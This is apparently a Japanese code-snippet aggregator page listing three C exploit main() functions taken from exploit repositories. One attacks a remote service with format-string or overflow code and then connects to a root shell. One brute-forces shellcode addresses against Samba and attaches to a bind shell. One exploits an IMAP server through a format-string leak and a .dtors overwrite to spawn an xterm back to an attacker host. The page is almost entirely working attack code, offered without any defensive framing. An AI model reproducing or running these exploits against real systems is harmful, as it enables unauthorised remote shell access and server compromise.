C++ (Cpp) re_conntの例

コード例 #1

0

ファイルを表示

ファイル: 0x82-meOw_linuxer_forever.c プロジェクト: B-Rich/osf_db

int main(int argc,char *argv[])
{
	int sock,type=0;
	int port=(PORT);
	char host[256]=DEF_HOST;

	int sflag=platform[type].sflag;
	unsigned long retloc=platform[type].dtors_addr;
	unsigned long shell=platform[type].shell;

	(void)banrl();
	while((sock=getopt(argc,argv,"DdF:f:R:r:S:s:H:h:T:t:Ii"))!=EOF) {
		extern char *optarg;
		switch(sock) {
			case 'D':
			case 'd':
				__debug_chk=1;
				break;
			case 'R':
			case 'r':
				retloc=strtoul(optarg,NULL,0);
				break;
			case 'S':
			case 's':
				shell=strtoul(optarg,NULL,0);
				break;
			case 'F':
			case 'f':
				sflag=atoi(optarg);
				break;
			case 'H':
			case 'h':
				memset((char *)host,0,sizeof(host));
				strncpy(host,optarg,sizeof(host)-1);
				break;
			case 'T':
			case 't':
				type=atoi(optarg);
				if(type>=4){
					(void)usage(argv[0]);
				} else {
					retloc=platform[type].dtors_addr;
					shell=platform[type].shell;
					sflag=platform[type].sflag;
				}
				break;
			case 'I':
			case 'i':
				(void)usage(argv[0]);
				break;
			case '?':
				fprintf(stderr,"Try `%s -i' for more information.\n\n",argv[0]);
				exit(-1);
				break;
		}
	}

	fprintf(stdout," #\n # target host: %s:%d\n",host,port);
	fprintf(stdout," # type: %s\n",platform[type].os_type);
	switch(type)
	{
		case 0:
		case 1:
			(int)make_fmt_code(retloc,shell,sflag);
			break;
		case 2:
			(int)make_bof_code(shell,sflag,0);
			break;
		case 3:
			(int)make_bof_code(shell,sflag,1);
	}

	fprintf(stdout," # send code size: %d byte\n",strlen(t_atk));
	sock=setsock(host,port);
	(void)re_connt(sock);

	if(__debug_chk) sleep(10);

	send(sock,t_atk,strlen(t_atk),0);
	close(sock);

	fprintf(stdout," #\n # Waiting rootshell, Trying %s:36864 ...\n",host);
	sleep(1);
	sock=setsock(host,36864);
	(void)re_connt(sock);

	fprintf(stdout," # connected to %s:36864 !\n #\n\n",host);
	(void)conn_shell(sock);
}

コード例 #2

0

ファイルを表示

ファイル: 0x82-Remote.54AAb4.xpl.c プロジェクト: B-Rich/osf_db

int main(int argc,char *argv[])
{
	int sock,whtl,type=0,brute_f=0;
	char tg_host[0x82]="localhost";
	u_long shell=plat[type].shell;
	
	(void)banrl();
	if(argc<2)
	{
		(void)usage(argv[0]);
	}
	
	while((whtl=getopt(argc,argv,"H:h:S:s:T:t:IiB:b"))!=-1)
	{
		extern char *optarg;
		switch(whtl)
		{
			case 'H':
			case 'h':
				memset((char *)tg_host,0,sizeof(tg_host));
				strncpy(tg_host,optarg,sizeof(tg_host)-1);
				break;
				
			case 'S':
			case 's':
				shell=strtoul(optarg,0,0);
				break;
				
			case 'T':
			case 't':
				if((type=atoi(optarg))>1)
				{
					(void)usage(argv[0]);
				}
				else shell=plat[type].shell;
				break;
				
			case 'I':
			case 'i':
				(void)usage(argv[0]);
				break;
				
			case 'B':
			case 'b':
				brute_f++;
				break;
				
			case '?':
				fprintf(stderr," Try `%s -i' for more information.\n\n",argv[0]);
				exit(-1);
				break;
		}
	}
	if(brute_f)
	{
		fprintf(stdout," **\n ** OK, It's good selection, Attack tries %d times.\n",BRUTE_AT);
		fprintf(stdout," ** If work process is boring, drink coffee and wait. hehe ;-D\n **\n\n");
		fprintf(stdout," [*] Brute-Force mode:\n\n");
		fprintf(stdout," |----+----+----+----+----+----+----+----+----+----+----+----+----|");
		fprintf(stdout,"\n |");

		for(brute_f=0;brute_f<BRUTE_AT;brute_f++)
		{
			fflush(stdout);
			fprintf(stdout,"=");

			shell+=(0x100);
			sock=(int)setsock(tg_host,ATK_PORT);
			
			if((int)re_connt(sock,0)==-1)
			{
				while(!(brute_f>=BRUTE_AT-1))
				{
					fprintf(stdout,"=");
					brute_f++;
				}
				fprintf(stdout,"|\n\n");
				fprintf(stderr," [-] Connect Failed.\n\n");
				exit(-1);
			}
			
			__atk_code_send_recv(sock,shell);
			close(sock);
			sleep(2);
			sock=(int)setsock(tg_host,SH_PORT);
			
			if((int)re_connt(sock,0)==-1)
			{
				continue;
			}
			
			while(!(brute_f>=BRUTE_AT-1))
			{
				fprintf(stdout,"=");
				brute_f++;
			}
			
			fprintf(stdout,"|\n\n");
			fprintf(stdout," [+] Shellcode address: %p\n",shell);
			fprintf(stdout," [*] Brute-Force end !!\n\n");
			fprintf(stdout," **\n ** Bind shellcode is port 10000.\n");
			fprintf(stdout," ** If bindshell port number was changed, change connection port.\n **\n\n");
			
			(void)send_recv_sh(sock);
		}

		fprintf(stdout,"|\n\n **\n");
		fprintf(stdout," ** Brute-Force exploit failed. Reason is simple.\n **\n");
		fprintf(stdout," ** Could not search shellcode's position during %d times.\n",BRUTE_AT);
		fprintf(stdout," ** Or, Operating System's target that we attack isn't.\n");
		fprintf(stdout," ** OOops ! is server Samba version doubtful ??\n **\n\n");
		exit(-1);
	}
	else
	{
		fprintf(stdout," [0] Target: %s\n",plat[type].ost);
		fprintf(stdout," [1] Set socket.\n");
		sock=(int)setsock(tg_host,ATK_PORT);
		(int)re_connt(sock,1);
		
		fprintf(stdout," [2] Make shellcode & Send Packet.\n");
		__atk_code_send_recv(sock,shell);
		close(sock);
		
		fprintf(stdout," [3] Trying %s:%d.\n",tg_host,SH_PORT);
		sleep(2);
		
		sock=(int)setsock(tg_host,SH_PORT);
		(int)re_connt(sock,1);
		
		fprintf(stdout," [*] Connected to %s:%d.\n",tg_host,SH_PORT);
		(void)send_recv_sh(sock);
	}
}

コード例 #3

0

ファイルを表示

ファイル: 3787.c プロジェクト: 0x24bin/exploit-database

int main(int argc,char *argv[]){
	int sflag=DF_SFLAG;
	unsigned long do_system_addr=DO_SYSTEM;
	unsigned long retloc=DTOR_END_ADDR;
	unsigned long shaddr=SHELL;
	char host[256]=DEF_STR;
	int port=PORT;
	extern char *optarg;
	int sock,i,r=0;
	char buf[1024];
	char user[256]=DEF_STR;
	char pass[256]=DEF_STR;
	char *ptr=NULL;
	char xhost_ip_buf[256]=XHOST_IP;

	get_10_ip(xhost_ip_buf);

	memset((char *)buf,0,sizeof(buf));
	memset((char *)user,0,sizeof(user));
	memset((char *)pass,0,sizeof(pass));

	(void)banrl();
	while((sock=getopt(argc,argv,"R:r:D:d:H:h:P:p:F:f:I:i:U:u:S:s:"))!=EOF){
		switch(sock){
			case 'R':
			case 'r':
				retloc=strtoul(optarg,NULL,0);
				break;
			case 'D':
			case 'd':
				do_system_addr=strtoul(optarg,NULL,0);
				break;
			case 'H':
			case 'h':
				memset((char *)host,0,sizeof(host));
				strncpy(host,optarg,sizeof(host)-1);
				break;
			case 'P':
			case 'p':
				port=atoi(optarg);
				break;
			case 'F':
			case 'f':
				sflag=atoi(optarg);
				break;
			case 'I':
			case 'i':
				memset((char *)xhost_ip_buf,0,sizeof(xhost_ip_buf));
				strncpy(xhost_ip_buf,optarg,sizeof(xhost_ip_buf)-1);
				get_10_ip(xhost_ip_buf);
				break;
			case 'U':
			case 'u':
				memset((char *)user,0,sizeof(user));
				strncpy(user,optarg,sizeof(user)-1);
				break;
			case 'S':
			case 's':
				memset((char *)pass,0,sizeof(pass));
				strncpy(pass,optarg,sizeof(pass)-1);
				break;
			case '?':
			default:
				(void)usage(argv[0]);
				break;
		}
	}
	if(!strcmp(host,DEF_STR)||!strcmp(user,DEF_STR)||!strcmp(pass,DEF_STR)){
		(void)usage(argv[0]);
	}

	fprintf(stdout," [+] make socket.\n");
	fprintf(stdout," [+] host: %s.\n",host);
	fprintf(stdout," [+] port: %d.\n",port);
	sock=setsock(host,port);
	re_connt(sock);

	recv(sock,buf,sizeof(buf)-1,0);
	if(strstr(buf,"IMAP4rev1")){
		fprintf(stdout," [+] OK, IMAP4rev1.\n");
	}
	else {
		fprintf(stdout," [-] Ooops, no match.\n\n");
		close(sock);
		exit(-1);
	}

	memset((char *)buf,0,sizeof(buf));
	snprintf(buf,sizeof(buf)-1,"1 login \"%s\" \"%s\"\n",user,pass);
	send(sock,buf,strlen(buf),0);
	memset((char *)buf,0,sizeof(buf));
	while(recv(sock,buf,sizeof(buf)-1,0)){
		if(strstr(buf," Completed")){
			fprintf(stdout," [+] login completed.\n");
			break;
		}
		else if(strstr(buf," rejected")){
			fprintf(stdout," [-] login failed.\n\n");
			exit(-1);
		}
	}

	memset((char *)buf,0,sizeof(buf));
	snprintf(buf,sizeof(buf)-1,"1 select \"inbox\"\n");
	send(sock,buf,strlen(buf),0);
	memset((char *)buf,0,sizeof(buf));
	while(recv(sock,buf,sizeof(buf)-1,0)){
		if(strstr(buf," Completed")){
			fprintf(stdout," [+] select success.\n");
			break;
		}
		else if(strstr(buf," NO SELECT")){
			fprintf(stdout," [-] select failed.\n\n");
			exit(-1);
		}
	}


	/* get, do_system address */
	fprintf(stdout," [+] find do_system address.\n");
	memset((char *)buf,0,sizeof(buf));
	snprintf(buf,sizeof(buf)-1,"1 search topic |%%%d$x|\n",GET_DO_SYSTEM_SFLAG);
	send(sock,buf,strlen(buf),0);
	memset((char *)buf,0,sizeof(buf));
	recv(sock,buf,sizeof(buf)-1,0);
	if(strstr(buf,"|")){
		ptr=(char *)strstr(buf,"|");
		sscanf(ptr,"|%x|\n",&do_system_addr);
	}
	do_system_addr-=DEF_DO_SYSTEM_OFFSET;

	fprintf(stdout," [+] make exploit code.\n");
	fprintf(stdout," [+] retloc address: %p.\n",retloc);
	fprintf(stdout," [+] do_system address: %p.\n",do_system_addr);
	fprintf(stdout," [+] send exploit code.\n");

	send_exploit_code(sock,retloc,do_system_addr,sflag);
	for(i=0,r=4;i<(sizeof(xterm_shell)/4);i++,r+=2){
		send_exploit_code(sock,retloc+r,xterm_shell[i],sflag);
	}


#define LOGOUT_CMD "1 logout\n"
	send(sock,LOGOUT_CMD,strlen(LOGOUT_CMD),0);
	sleep(1);

	recv(sock,buf,sizeof(buf)-1,0);
	close(sock);

	if(strstr(buf,"BYE")&&strstr(buf,"LOGOUT")){
		fprintf(stdout," [+] logout success.\n\n");
	}
	else {
		fprintf(stdout," [-] logout failed.\n\n");
		exit(-1);
	}
	exit(0);
}